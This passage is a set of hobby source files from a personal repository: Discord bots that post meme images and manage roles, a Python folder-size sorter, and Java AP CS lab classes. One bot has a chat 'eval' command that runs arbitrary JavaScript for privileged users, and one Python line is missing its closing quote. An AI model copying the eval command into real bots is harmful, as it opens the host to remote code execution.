"content_id": "1c74e7594c65131bc610492af72a9a6982b99a75",
"detected_licenses": [
"Unlicense",
"LicenseRef-scancode-public-domain"
],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 5143,
"license_type": "permissive",
"max_line_length": 264,
"num_lines": 198,
"path": "/JavaScript/DiscordBots/maddie-test/switch.js",
"repo_name": "ZenIsBestWolf/toolbox",
"src_encoding": "UTF-8",
"text": "const Discord = require('discord.js');\nconst client = new Discord.Client();\nvar token = \"redacted\";\nclient.on('ready', () => {\n\tconsole.log('Online. The default global prefix is: ' + prefix);\n\tclient.user.setGame('with Landen\\'s coffee!');\n});\nprocess.on('unhandledRejection', console.error);\nvar prefix = '!';\nvar zen = \"183672121522782208\";\nvar jc = \"359539469231063052\";\nvar lg = \"359538295375659010\";\nclient.on('guildMemberAdd', member => {\n\tlet guild = member.guild;\n\tif (guild.id === lg) {\n\t\tguild.channels.get(jc).send(\"User \" + member + \" has joined.\")\n\t};\n});\nclient.on('guildMemberRemove', member => {\n\tlet guild = member.guild;\n\tif (guild.id === lg) {\n\t\tguild.channels.get(jc).send(\"User \" + member + \" has left.\")\n\t};\n});\nclient.on('guildBanAdd', (guild, user) => {\n\tif (guild.id === lg) {\n\t\tguild.channels.get(jc).send(\"User \" + user + \" has been banned.\")\n\t};\n});\nclient.on('message', message => {\n\tif (!message.content.startsWith(prefix)) return;\n\tif (message.author.bot) return;\n\tvar args = message.content.substring(prefix.length).split(\" \");\n\tvar embarrassedarray = [\"./src/embarrassed/embarrassedkat.png\", \"./src/embarrassed/embarrassedmike.png\", \"./src/embarrassed/embarrassedkeith.png\"];\n\tvar kekarray = [\"./src/kek/kekzen.png\" // This is so in the future when I get more KEK images, I can just add them with ease.\n\t];\n\tvar smugarray = [\"./src/smug/smugzen.png\", \"./src/smug/smugflora.png\"];\n\tswitch (args[0]) {\n\t\tcase \"angrykeith\":\n\t\t\tmessage.channel.send({\n\t\t\t\tfile: \"./src/angrykeith.png\"\n\t\t\t});\n\t\t\tmessage.delete();\n\t\t\tbreak;\n\t\tcase \"coffee\":\n\t\t\tmessage.channel.send({\n\t\t\t\tfile: \"./src/coffee.gif\"\n\t\t\t});\n\t\t\tmessage.delete();\n\t\t\tbreak;\n\t\tcase \"embarrassed\":\n\t\t\tmessage.channel.send({\n\t\t\t\tfile: embarrassedarray[Math.floor(Math.random() * embarrassedarray.length)]\n\t\t\t});\n\t\t\tmessage.delete();\n\t\t\tbreak;\n\t\tcase \"happy\":\n\t\t\tmessage.channel.send({\n\t\t\t\tfile: \"./src/happy.png\"\n\t\t\t});\n\t\t\tmessage.delete();\n\t\t\tbreak;\n\t\tcase \"help\":\n\t\t\tmessage.author.send(\"```!angrykeith\\n!coffee\\n!embarrassed\\n!happy\\n!help\\n!jerks\\n!kek\\n!northkinds\\n!profanity\\n!really\\n!rekt\\n!ripchat\\n!shhh\\n!shook\\n!smug\\n!source\\n!topkek\\n!triforce\\n!triggered\\n!wat```\\nHave suggestions? DM them to ZenIsBestWolf#0446!\");\n\t\t\tmessage.delete();\n\t\t\tbreak;\n\t\tcase \"jerks\":\n\t\t\tmessage.channel.send({\n\t\t\t\tfile: \"./src/jerks.png\"\n\t\t\t});\n\t\t\tmessage.delete();\n\t\t\tbreak;\n\t\tcase \"kek\":\n\t\t\tmessage.channel.send({\n\t\t\t\tfile: kekarray[Math.floor(Math.random() * kekarray.length)]\n\t\t\t});\n\t\t\tmessage.delete();\n\t\t\tbreak;\n\t\tcase \"lenny\":\n\t\t\tmessage.channel.send(\"( ͡° ͜ʖ ͡°)\");\n\t\t\tmessage.delete();\n\t\t\tbreak;\n\t\tcase \"northkinds\":\n\t\t\tmessage.channel.send({\n\t\t\t\tfile: \"./src/northkinds.png\"\n\t\t\t});\n\t\t\tmessage.delete();\n\t\t\tbreak;\n\t\tcase \"profanity\":\n\t\t\tmessage.channel.send({\n\t\t\t\tfile: \"./src/profanity.png\"\n\t\t\t});\n\t\t\tmessage.delete();\n\t\t\tbreak;\n\t\tcase \"really\":\n\t\t\tmessage.channel.send({\n\t\t\t\tfile: \"./src/really.png\"\n\t\t\t});\n\t\t\tmessage.delete();\n\t\t\tbreak;\n\t\tcase \"rekt\":\n\t\t\tmessage.channel.send({\n\t\t\t\tfile: \"./src/rekt.png\"\n\t\t\t});\n\t\t\tmessage.delete();\n\t\t\tbreak;\n\t\tcase \"ripchat\":\n\t\t\tmessage.channel.send({\n\t\t\t\tfile: \"./src/ripchat.png\"\n\t\t\t});\n\t\t\tmessage.delete();\n\t\t\tbreak;\n\t\tcase \"shhh\":\n\t\t\tmessage.channel.send({\n\t\t\t\tfile: \"./src/shhh.png\"\n\t\t\t});\n\t\t\tmessage.delete();\n\t\t\tbreak;\n\t\tcase \"shook\":\n\t\t\tmessage.channel.send({\n\t\t\t\tfile: \"./src/shook.png\"\n\t\t\t});\n\t\t\tmessage.delete();\n\t\t\tbreak;\n\t\tcase \"smug\":\n\t\t\tmessage.channel.send({\n\t\t\t\tfile: smugarray[Math.floor(Math.random() * smugarray.length)]\n\t\t\t});\n\t\t\tmessage.delete();\n\t\t\tbreak;\n\t\tcase \"source\":\n\t\t\tmessage.reply(\"Maddie is an open-source bot by ZenIsBestWolf, and is free to modify on GitHub. Check her repository out here: https://github.com/ZenIsBestWolf/maddie-bot.\");\n\t\t\tmessage.delete();\n\t\t\tbreak;\n\t\tcase \"topkek\":\n\t\t\tmessage.channel.send({\n\t\t\t\tfile: \"./src/topkek.png\"\n\t\t\t});\n\t\t\tmessage.delete();\n\t\t\tbreak;\n\t\tcase \"triforce\":\n\t\t\tmessage.channel.send({\n\t\t\t\tfile: \"./src/triforce.png\"\n\t\t\t});\n\t\t\tmessage.delete();\n\t\t\tbreak;\n\t\tcase \"triggered\":\n\t\t\tmessage.channel.send({\n\t\t\t\tfile: \"./src/triggered.gif\"\n\t\t\t});\n\t\t\tmessage.delete();\n\t\t\tbreak;\n\t\tcase \"wat\":\n\t\t\tmessage.channel.send({\n\t\t\t\tfile: \"./src/wat.png\"\n\t\t\t});\n\t\t\tmessage.delete();\n\t\t\tbreak;\n\t};\n\tif (message.author.id === zen) {\n\t\tswitch (args[0]) {\n\t\t\tcase \"chat\":\n\t\t\t\tvar msg = args.join(' ').slice(args[0].length);\n\t\t\t\tmessage.channel.send(msg);\n\t\t\t\tmessage.delete();\n\t\t\t\tbreak;\n\t\t\tcase \"chatin\":\n\t\t\t\tvar targ = args[1]\n\t\t\t\tvar msg = args.join(' ').slice(args[0].length + args[1].length + 1)\n\t\t\t\tclient.channels.get(targ).send(msg);\n\t\t\t\tmessage.delete();\n\t\t\t\tbreak;\n\t\t\tcase \"nick\":\n\t\t\t\tvar nick = args.join(' ').slice(args[0].length);\n\t\t\t\tmessage.guild.me.setNickname(nick);\n\t\t\t\tmessage.delete();\n\t\t\t\tbreak;\n\t\t\tcase \"perm\":\n\t\t\t\tvar perm = args[1];\n\t\t\t\tif (message.guild.me.hasPermission(perm)) {\n\t\t\t\t\tmessage.reply(\"True.\").then(e => setTimeout(function() {\n\t\t\t\t\t\te.delete();\n\t\t\t\t\t}, 10000));\n\t\t\t\t\tmessage.delete();\n\t\t\t\t} else {\n\t\t\t\t\tmessage.reply(\"False.\").then(e => setTimeout(function() {\n\t\t\t\t\t\te.delete();\n\t\t\t\t\t}, 10000));\n\t\t\t\t\tmessage.delete()\n\t\t\t\t};\n\t\t\t\tbreak;\n\t\t\tcase \"shutdown\":\n\t\t\t\tprocess.exit();\n\t\t\t\tbreak;\n\t\t};\n\t};\n});\nclient.login(token);\n"
},
{
"alpha_fraction": 0.6071082353591919,
"alphanum_fraction": 0.6138933897018433,
"avg_line_length": 31.589473724365234,
"blob_id": "90352ca85b5229f8015e1b9211f74597ea18b9a9",
"content_id": "0724c725372907b726328cd52bf3d30550452193",
"detected_licenses": [
"Unlicense",
"LicenseRef-scancode-public-domain"
],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 3095,
"license_type": "permissive",
"max_line_length": 199,
"num_lines": 95,
"path": "/JavaScript/DiscordBots/gerald-bot/index.js",
"repo_name": "ZenIsBestWolf/toolbox",
"src_encoding": "UTF-8",
"text": "// Semicolon continuity is based on Java requirements.\nconst Discord = require('discord.js');\nconst { inspect } = require('util')\nconst client = new Discord.Client({disableMentions: \"everyone\"});\nconst commandList = require('./commands.json');\nconst config = require('./config.json');\nconst prefix = config.prefix; // redundant but i am so used to this so i need this\nclient.on('ready', () => {\n    console.log(\"Online and ready to go. Prefix is set to \" + prefix);\n    client.user.setActivity(\"sup lmao\");\n    //client.users.resolve(config.developerAccount).send(\"Rebooted. Prefix is currently set to: \" + prefix);\n})\nprocess.on('unhandledRejection', error => {\n    console.log(error.stack);\n    client.users.resolve(config.developerAccount).send(error.stack).catch(e => {\n        client.users.resolve(config.developerAccount).send(\"An error occurred, however I could not send it.\");\n        console.log(\"Could not send to the designated developer account for some reason. (Message was likely too long!)\");\n    })\n})\nclient.on('message', message => {\n    if (!message.content.startsWith(prefix)) return;\n    if (message.author.bot) return;\n    if (message.channel.type == \"dm\") {\n        message.channel.send(\"can you do this stuff in a server please\");\n        return;\n    }\n    var args = message.content.substring(prefix.length).split(\" \");\n    var command = commandList[args[0].toLowerCase()];\n    var permissionSet = [0,0];\n    for (let i = 0; i < config.overrideUsers.length; i++) if (message.author.id == config.overrideUsers[i]) permissionSet = [1,2];\n    for (let i = 0; i < config.staffRoles.length; i++) if (message.member.roles.cache.has(message.member.guild.roles.cache.findKey(role => role.name === config.staffRoles[i]))) permissionSet = [0,1];\n    if (message.member.guild.ownerID === message.author.id) permissionSet = [0,2];\n    // bot time\n    if (args[0] == \"check\") {\n        message.reply(\"Checking if you have a role called \" + args[1]);\n        let checkStat = message.member.roles.cache.has(message.member.guild.roles.cache.findKey(role => role.name === args[1]));\n        message.reply(\"Got: \" + checkStat);\n        console.log(checkStat);\n    }\n    if (args[0] == \"eval\") {\n        if (permissionSet[1] < 1) {\n            message.reply(\"You do not have permission to run this. This is GLOBAL command asking for level 1. You are GLOBAL level 0.\");\n            return;\n        }\n        let toEval = args.join(\" \").slice(args[0].length);\n        try {\n            var evaluated = inspect(eval(toEval), { depth: 0 });\n        }\n        catch(e) {\n            message.reply(`something fucked up while evaluating: ${e.message}`);\n        }\n        try {\n            if (!toEval) {\n                message.reply(\"i can't evaluate air dumbass\");\n            } else {\n                message.reply(\"ok heres what happened\");\n                message.channel.send(`\\`\\`\\`JavaScript\\n${evaluated}\\n\\`\\`\\``)\n            }\n        } catch(e) {\n            console.log(\"Could not evaluate: \" + e.message);\n        }\n    }\n})\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\nclient.login(\"redacted\");"
},
{
"alpha_fraction": 0.6049792766571045,
"alphanum_fraction": 0.6062240600585938,
"avg_line_length": 39.18333435058594,
"blob_id": "e833a1646ffa0140b6f2f39a5395c0b3caf705ef",
"content_id": "fd4595c663e18b91c4609fe05efa4b75865d6091",
"detected_licenses": [
"Unlicense",
"LicenseRef-scancode-public-domain"
],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 2436,
"license_type": "permissive",
"max_line_length": 334,
"num_lines": 60,
"path": "/JavaScript/DiscordBots/crimp-bot/index.js",
"repo_name": "ZenIsBestWolf/toolbox",
"src_encoding": "UTF-8",
"text": "const Discord = require('discord.js');\nconst client = new Discord.Client({\n\tdisableMentions: \"everyone\",\n\tpartials: ['MESSAGE']\n});\nconst prefix = \"!\";\nconst commands = require('./commands.json');\nconst random = require('./random.json')\n\nclient.on('ready', () => {\n\tconsole.log(\"Ready\");\n\tclient.user.setPresence({\n\t\tactivity: {\n\t\t\tname: \"the call of the universe.\",\n\t\t\ttype: \"LISTENING\"\n\t\t},\n\t\tstatus: \"online\"\n\t});\n});\n\nclient.on('message', async message => {\n if (message.partial) await message.fetch(); // Deal with partials\n if (message.author.bot) return;\n let args = message.content.substring(prefix.length).split(\" \");\n let command = commands[args[0].toLowerCase()]; // For some reason, having a variable makes it so the following line works properly.\n if (command === undefined) return;\n \n switch (args[0].toLowerCase()) {\n\t\tcase \"help\":\n\t\t\tlet tbsHelp = \"Here are the list of commands:\\n\\n\";\n\t\t\tfor (let i = 0; i < Object.keys(commands).length; i++) { // This looks scary and if anyone has tips for making it less so please tell me.\n\t\t\t\tlet localcmd = commands[Object.keys(commands)[i]]; // makes things less messy\n\t\t\t\tif (localcmd[\"info\"] == \"alias\") continue;\n\t\t\t\ttbsHelp += \"**\" + prefix + Object.keys(commands)[i];\n\t\t\t\tlet tempvar = localcmd[\"args\"];\n\t\t\t\tif (!(tempvar === undefined)) {\n\t\t\t\t\ttbsHelp += \" [\" + tempvar + \"]\";\n };\n tbsHelp += \"**: \" + localcmd[\"info\"] + \"\\n\"\n\t\t\t};\n\t\t\tmessage.channel.send(tbsHelp);\n\t\t\tbreak\n case \"assimiliate\":\n message.channel.send(\"Another follower.\");\n break;\n case \"commune\": \n message.channel.send(random[\"commune\"][Math.floor(Math.random() * random[\"commune\"].length)].replace(\"{user}\", \"<@\" + message.author.id + \">\"));\n break;\n case \"sing\":\n message.channel.send(\"Ahh... this tune appeases us. Thank you. I grant unto thee the blessing of the Crimp for a day.\");\n break;\n case \"truth\":\n message.channel.send(\"You wish to know the truth, \" + message.author.username + \"? How vain. Very well, we shall describe it for you. Your universe is nothing but p̷o̷i̵u̶y̵t̸r̴e̸w̵q̴a̵s̴d̶f̶g̸h̸j̶k̵l̸m̶n̶b̶v̵c̴x̷z̸. Pardon us, but it appears that we cannot put it into simple mortal terms. You'd best keep searching...\");\n break;\n default:\n break;\n }\n})\n\nclient.login(\"REDACTED\")"
},
{
"alpha_fraction": 0.6193997263908386,
"alphanum_fraction": 0.6420182585716248,
"avg_line_length": 35.492061614990234,
"blob_id": "298fde2252bd1b5716ebcc727f4d44b3f01c49e1",
"content_id": "9b07020f4fd126e81a55d0ffc87b02361c1cca5f",
"detected_licenses": [
"MIT",
"Unlicense",
"LicenseRef-scancode-public-domain"
],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 4598,
"license_type": "permissive",
"max_line_length": 260,
"num_lines": 126,
"path": "/JavaScript/DiscordBots/skid-bot-test/index.js",
"repo_name": "ZenIsBestWolf/toolbox",
"src_encoding": "UTF-8",
"text": "// Skid Bot created by ZenIsBestWolf#0446.\n// This is intended for one server only. Things may break if used in multiple servers.\nconst Discord = require('discord.js');\nconst client = new Discord.Client();\nvar token = \"redacted\"\nvar prefix = \".\"\nvar zen = \"183672121522782208\"\nvar requestChannelID = \"378667587510468608\"\nclient.on('ready', () => {\n\tconsole.log('Skid Bot is online. Prefix is ' + prefix)\n\tclient.user.setGame('being a skid.')\n});\nprocess.on('unhandledRejection', console.error);\nvar memberTrackingChannelID = \"376581386540285963\"\nclient.on('guildMemberAdd', member => {\n\tlet guild = member.guild;\n\tguild.channels.get(memberTrackingChannelID).send(member + \" has joined the server! Welcome!\");\n});\nclient.on('guildMemberRemove', member => {\n\tlet guild = member.guild;\n\tguild.channels.get(memberTrackingChannelID).send(member + \" has left. RIP!\");\n});\nclient.on('message', message => {\n\tif (!message.content.startsWith(prefix)) return;\n\tif (message.author.bot) return;\n\tvar args = message.content.substring(prefix.length).split(\" \");\n\tif (message.channel.id === requestChannelID) {\n\t\tvar role = args.join(' ').slice(args[0].length).trim().toLowerCase();\n\t\tswitch (args[0].toLowerCase()) {\n\t\t\tcase \"addrole\":\n\t\t\t\tswitch (role) {\n\t\t\t\t\tcase \"doorknob\":\n\t\t\t\t\t\tif (message.member.roles.exists(\"name\", \"doorknob\")) {\n\t\t\t\t\t\t\tmessage.reply(\":x: You already have that role!\")\n\t\t\t\t\t\t\treturn;\n\t\t\t\t\t\t}\n\t\t\t\t\t\tmessage.member.addRole(message.member.guild.roles.find(\"name\", \"doorknob\"));\n\t\t\t\t\t\tmessage.reply(\":white_check_mark: Role added!\")\n\t\t\t\t\t\tbreak;\n\t\t\t\t\tcase \"staff tt\":\n\t\t\t\t\t\tmessage.reply(\":x: I can't just *give* you the staff role!\")\n\t\t\t\t\t\tbreak;\n\t\t\t\t\tdefault:\n\t\t\t\t\t\tmessage.reply(\":question: I can't find that role. Did you spell it right?\")\n\t\t\t\t}\n\t\t\t\tbreak;\n\t\t\tcase \"removerole\":\n\t\t\t\tswitch (args[1].toLowerCase()) {\n\t\t\t\t\tcase \"doorknob\":\n\t\t\t\t\t\tif (!message.member.roles.exists(\"name\", \"doorknob\")) {\n\t\t\t\t\t\t\tmessage.reply(\":x: You don't have that role.\")\n\t\t\t\t\t\t\treturn;\n\t\t\t\t\t\t}\n\t\t\t\t\t\tmessage.member.removeRole(message.member.guild.roles.find(\"name\", \"doorknob\"));\n\t\t\t\t\t\tmessage.reply(\":white_check_mark: Role removed!\")\n\t\t\t\t\t\tbreak;\n\t\t\t\t\tcase \"staff tt\":\n\t\t\t\t\t\tmessage.reply(\"You shouldn\\'t have the staff role silly!\")\n\t\t\t\t\t\tbreak;\n\t\t\t\t\tdefault:\n\t\t\t\t\t\tmessage.reply(\":question: I can't find that role. 
Did you spell it right?\")\n\t\t\t\t}\n\t\t\t\tbreak;\n\t\t\tcase \"finish\":\n\t\t\t\tmessage.member.removeRole(message.member.guild.roles.find(\"name\", \"Skid\"));\n\t\t\t\tmessage.delete()\n\t\t\t\tbreak;\n\t\t};\n\t};\n\tswitch (args[0]) {\n\t\tcase \"help\":\n\t\t\tvar helpEmbed = new Discord.RichEmbed().setThumbnail(client.user.avatarURL).setAuthor('Commands', client.user.avatarURL).setTitle('Command List').setDescription('Commands everyone can use.').setColor(0x1bb80f).addField(prefix + 'help - Sends this command.')\n\t\t\tmessage.reply(helpEmbed)\n\t\t\tbreak;\n\t};\n\tif (message.member.roles.exists(\"name\", \"Staff\")) {\n\t\tconsole.log(\"Staff member \" + message.author.username + \" has called a command.\")\n\t\tswitch (args[0]) {\n\t\t\tcase \"purge\":\n\t\t\t\tif (isNaN(args[1])) {\n\t\t\t\t\tmessage.reply(\"Invalid number to purge.\").then(e => setTimeout(function() {\n\t\t\t\t\t\te.delete();\n\t\t\t\t\t}, 20000));\n\t\t\t\t\treturn;\n\t\t\t\t};\n\t\t\t\tif (args[1] > 100) {\n\t\t\t\t\tmessage.reply(\"The maximum value of messages you can purge is 100!\").then(e => setTimeout(function() {\n\t\t\t\t\t\te.delete();\n\t\t\t\t\t}, 20000));\n\t\t\t\t\treturn;\n\t\t\t\t};\n\t\t\t\tif (args[1] < 1) {\n\t\t\t\t\tmessage.reply(\"The minimum value of messages you can purge is 1!\").then(e => setTimeout(function() {\n\t\t\t\t\t\te.delete();\n\t\t\t\t\t}, 20000));\n\t\t\t\t\treturn;\n\t\t\t\t};\n\t\t\t\tvar purgenum = args[1]\n\t\t\t\tmessage.channel.fetchMessages({\n\t\t\t\t\tlimit: purgenum\n\t\t\t\t}).then(function(messages) {\n\t\t\t\t\tmessages.deleteAll();\n\t\t\t\t});\n\t\t\t\tbreak;\n\t\t};\n\t};\n\tif (message.author.id === zen) {\n\t\tswitch (args[0]) {\n\t\t\tcase \"famify\":\n\t\t\t\tvar fam = message.mentions.members.first();\n\t\t\t\tif (fam.roles.exists(\"name\", \"Staff\")) {\n\t\t\t\t\tmessage.reply(\"That skid is already part of the :triumph::ok_hand::family::sunglasses: **FAM SQUAD** :sunglasses::family::ok_hand::triumph:\")\n\t\t\t\t\treturn;\n\t\t\t\t}\n\t\t\t\tmessage.channel.send(\":triumph: :triumph: THROUGH THE POWER OF GRINDING :triumph: :triumph:\").then(setTimeout(function() {\n\t\t\t\t\tmessage.channel.send(\":ok_hand: :ok_hand: \" + args[1] + \" I HEAR BY DEEM YOU... :ok_hand: :ok_hand:\").then(setTimeout(function() {\n\t\t\t\t\t\tmessage.channel.send(\":family: :family: :sunglasses: :sunglasses: PART OF THE FAM :sunglasses: :sunglasses: :family: :family:\")\n\t\t\t\t\t}, 2000));\n\t\t\t\t}, 2000));\n\t\t\t\tfam.addRole(message.member.guild.roles.find(\"name\", \"Staff\"))\n\t\t\t\tbreak;\n\t\t\tdefault:\n\t\t}\n\t}\n});\nclient.login(token)\n"
},
{
"alpha_fraction": 0.5548738837242126,
"alphanum_fraction": 0.5671438574790955,
"avg_line_length": 31.600000381469727,
"blob_id": "efb4353dfbb412d64bb711a472b2f45db2010dba",
"content_id": "c4ba390d5c09de4d74c320b67e64ec609a8510c9",
"detected_licenses": [
"Unlicense",
"LicenseRef-scancode-public-domain"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1467,
"license_type": "permissive",
"max_line_length": 106,
"num_lines": 45,
"path": "/Python/Sort.py",
"repo_name": "ZenIsBestWolf/toolbox",
"src_encoding": "UTF-8",
"text": "# Prints a sorted by size (descending) list of folders within the given directory.\nimport os\nimport math\nimport operator\nimport collections\nprint(\"Enter the directory below to sort through. Example input: (Winodws) C:\\\\Users\\\\Zen (*nix) /home/zen\ndirectory = input(\"Enter directory: \")\nfolders = []\nfolderSizes = {}\nscount = 0\nfcount = 0\ntcount = 0\nfor r, d, f in os.walk(directory):\n for dir in d:\n folders.append(dir)\nfor i in folders:\n for r, d, f in os.walk(directory + i + \"\\\\\"):\n for file in f:\n tcount+=1\n if tcount%10000 == 0:\n print(\"Total: \" + str(tcount))\n print(\"Successful: \" + str(scount))\n print(\"Failed: \" + str(fcount))\n print()\n try:\n tmps = os.path.getsize(directory + i + \"\\\\\" + file)\n except:\n #print(\"File \" + directory + i + \"\\\\\" + file + \" was unreadable.\")\n fcount+=1\n continue\n tmps/=1024\n tmps = math.ceil(tmps)\n folderSizes[i] = tmps\n scount+=1\n# Sort\ntmpFS = sorted(folderSizes.items(), key=operator.itemgetter(1))\ntmpFS.reverse()\nsortedFolders = collections.OrderedDict(tmpFS)\nfor a in sortedFolders:\n if sortedFolders[a] == 1:\n sortedFolders[a] = str(sortedFolders[a]) + \"KB\"\n else:\n sortedFolders[a] = str(sortedFolders[a]) + \"KBs\"\nfor b in sortedFolders:\n print(b, sortedFolders[b])\n"
},
{
"alpha_fraction": 0.5518565773963928,
"alphanum_fraction": 0.5518565773963928,
"avg_line_length": 25.066667556762695,
"blob_id": "61ac763740bd84d8159da095f76395cb3c14bed1",
"content_id": "d5ccf979e6bb07c527794f03640356123099b789",
"detected_licenses": [
"Unlicense",
"LicenseRef-scancode-public-domain"
],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 781,
"license_type": "permissive",
"max_line_length": 61,
"num_lines": 30,
"path": "/Java/APCSA/Food.java",
"repo_name": "ZenIsBestWolf/toolbox",
"src_encoding": "UTF-8",
"text": "public class Food {\n private String mealType;\n private String color;\n private boolean isVegetarian;\n public Food() {\n mealType = \"\";\n color = \"\";\n isVegetarian = false;\n }\n public Food(String type, String col, boolean isVeg) {\n mealType = type;\n color = col;\n isVegetarian = isVeg;\n }\n public Food(String type, String col) {\n mealType = type;\n color = col;\n isVegetarian = false;\n }\n public Food(String type) {\n mealType = type;\n color = \"\";\n isVegetarian = false;\n }\n public void print() {\n System.out.println(\"Meal Type: \" + mealType);\n System.out.println(\"Color: \" + color);\n System.out.println(\"Is Vegetarian: \" + isVegetarian);\n }\n}"
},
{
"alpha_fraction": 0.5361823439598083,
"alphanum_fraction": 0.5601139664649963,
"avg_line_length": 21.227848052978516,
"blob_id": "609c70483924dd437f06c754ed60aef25953f879",
"content_id": "985b58c510c40e75fe8e72eb7bf218a202522992",
"detected_licenses": [
"Unlicense",
"LicenseRef-scancode-public-domain"
],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 1755,
"license_type": "permissive",
"max_line_length": 66,
"num_lines": 79,
"path": "/Java/APCSA/Lab05a1vst.java",
"repo_name": "ZenIsBestWolf/toolbox",
"src_encoding": "UTF-8",
"text": "// Lab05a1vst.java\n// The Rational Class Program I\n// This is the student starting Version of the Lab05a1 assignment.\nimport java.util.*;\npublic class Lab05a1vst\n{\n\tpublic static void main (String[] args)\n\t{\n Scanner s1 = new Scanner(System.in);\n Scanner s2 = new Scanner(System.in);\n System.out.print(\"\\nEnter the numerator ----> \");\n\t\tint num = s1.nextInt();\n\t\tSystem.out.print(\"\\nEnter the denominator --> \");\n\t\tint den = s2.nextInt();\n\t\tRational r = new Rational(num,den);\n\t\tr.displayData();\n\t}\n}\n\n\nclass Rational\n{\n\tprivate int num;\n\tprivate int den;\n\n // Complete for 80-Points\n\tpublic Rational(int initNum, int initDen) \n\t{\n num = initNum;\n den = initDen;\n\t}\n\n // Complete for 80-Points\n\tpublic double getDecimal() \n { \n return (double) num / (double) den;\n }\n \n // Complete for 80-Points\n public String getRational() \n { \n return \"\" + num + \"/\" + den;\n }\n\n // Complete for 100-Points\n\tpublic String getReduced() \n {\n int gcf = getGCF(num, den);\n int rNum = num/gcf;\n int rDen = den/gcf;\n return \"\" + rNum + \"/\" + rDen;\n }\n\n // Method for 80-Points; Change for 100-Points\n\tpublic void displayData()\n\t{\n\t\tSystem.out.println();\n\t\tSystem.out.println(getRational() + \" equals \" + getDecimal());\n System.out.println();\n System.out.println(\"and reduces to \" + getReduced());\n\t}\n\n // Complete for 100-Points\n\tprivate int getGCF(int n1,int n2)\n\t{\n int remainder = 1;\n int gcf = 1;\n while (remainder != 0) {\n remainder = n1%n2;\n if (remainder == 0) {\n gcf = n2;\n } else {\n n1 = n2;\n n2 = remainder;\n }\n }\n return gcf;\n\t}\n}"
},
{
"alpha_fraction": 0.5715676546096802,
"alphanum_fraction": 0.6825705766677856,
"avg_line_length": 36.01801681518555,
"blob_id": "ce8a7d285acf1a1183bddfb89a9909d7f900d3c5",
"content_id": "98be9ff528a84509999707ff9247aaa2cf5a7c36",
"detected_licenses": [
"Unlicense",
"LicenseRef-scancode-public-domain"
],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 4108,
"license_type": "permissive",
"max_line_length": 88,
"num_lines": 111,
"path": "/Java/APCSA/Lab02avstNICE.java",
"repo_name": "ZenIsBestWolf/toolbox",
"src_encoding": "UTF-8",
"text": "import java.awt.*;\nimport java.applet.*;\npublic class Lab02avstNICE extends Applet {\n\tpublic void paint(Graphics g) {\n\t\t// Define color set.\n\t\tColor black = new Color(0,0,0);\n\t\tColor white = new Color(255,255,255);\n\t\tColor red = new Color(255,0,0);\n\t\tColor green = new Color(0,255,0);\n\t\tColor blue = new Color(0,0,255);\n\t\tColor gray = new Color((float)0,(float)0,(float)0,(float)0.5);\n\t\tthis.setSize(3000,1600); // Applet window size.\n\t\tg.setColor(black); // Make sure default color is set.\n\t\tdrawCube(g,500,500,500); // Draw cube.\n\t\tdrawSphere(g,450,450,500,130); // Draw sphere.\n\t\tdrawFlower(g,1400,800,100); // Draw pacmen flower.\n\t\t// Draw inscribed triangle.\n\t\tg.drawOval(1500,500,400,400); // Draw outer circle.\n\t\tg.drawPolygon(new int[] {1600,1898,1600},new int[] {530,700,878},3); // Draw triangle.\n\t\tg.drawOval(1600,600,200,200); // Draw inner circle.\n\t\t// Draw APCS\n\t\t// Outside of A.\n\t\tg.setColor(red); // Color of outside.\n\t\t// Draw an fill the base.\n\t\tg.drawRect(500,1200,150,250);\n\t\tg.fillRect(500,1200,150,250);\n\t\t// Inside of A.\n\t\tg.setColor(white); // Appear translucent.\n\t\t// Draw and fill the larger lower detail.\n\t\tg.drawRect(550,1350,50,100);\n\t\tg.fillRect(550,1350,50,100);\n\t\t// Draw and fill the smaller upper detail.\n\t\tg.drawRect(550,1250,50,50);\n\t\tg.fillRect(550,1250,50,50);\n\t\t// Outside of P.\n\t\tg.setColor(blue); // Color of outside.\n\t\t// Draw an fill the base.\n\t\tg.drawRect(700,1200,150,250);\n\t\tg.fillRect(700,1200,150,250);\n\t\t// Inside of P.\n\t\tg.setColor(white); // Appear translucent.\n\t\t// Draw and fill the larger lower detail.\n\t\tg.drawRect(750,1350,100,100);\n\t\tg.fillRect(750,1350,100,100);\n\t\t// Draw and fill the smaller upper detail.\n\t\tg.drawRect(750,1250,50,50);\n\t\tg.fillRect(750,1250,50,50);\n\t\t// Outside of C.\n\t\tg.setColor(green); // Color of outside.\n\t\t// Draw an fill the base.\n\t\tg.drawRect(900,1200,150,250);\n\t\tg.fillRect(900,1200,150,250);\n\t\t// Inside of C.\n\t\tg.setColor(white); // Appear translucent.\n\t\t// Draw and fill the detail.\n\t\tg.drawRect(950,1250,100,150);\n\t\tg.fillRect(950,1250,100,150);\n\t\t// Outside of S.\n\t\tg.setColor(gray); // Color of outside.\n\t\t// Draw an fill the base.\n\t\tg.drawRect(1100,1200,150,250);\n\t\tg.fillRect(1100,1200,150,250);\n\t\t// Inside of S.\n\t\tg.setColor(white); // Appear translucent.\n\t\t// Draw and fill the upper detail.\n\t\tg.drawRect(1150,1250,100,50);\n\t\tg.fillRect(1150,1250,100,50);\n\t\t// Draw and fill the lower detail.\n\t\tg.drawRect(1100,1350,100,50);\n\t\tg.fillRect(1100,1350,100,50);\n\t}\n\tstatic void drawCube(Graphics g, int x, int y, int size) {\n\t\tint shift = size/4;\n\t\tint shiftedX = x-shift;\n\t\tint shiftedY = y-shift;\n\t\tg.drawRect(x,y,size,size); // Square one.\n\t\tg.drawRect(shiftedX,shiftedY,size,size); // Square two, which is a moved square one.\n\t\t// Draw the connecting lines to form the illusion of a cube.\n\t\tg.drawLine(x,y,shiftedX,shiftedY);\n\t\tg.drawLine(x+size,y,shiftedX+size,shiftedY);\n\t\tg.drawLine(x+size,y+size,shiftedX+size,shiftedY+size);\n\t\tg.drawLine(x,y+size,shiftedX,shiftedY+size);\n\t}\n\tstatic void drawSphere(Graphics 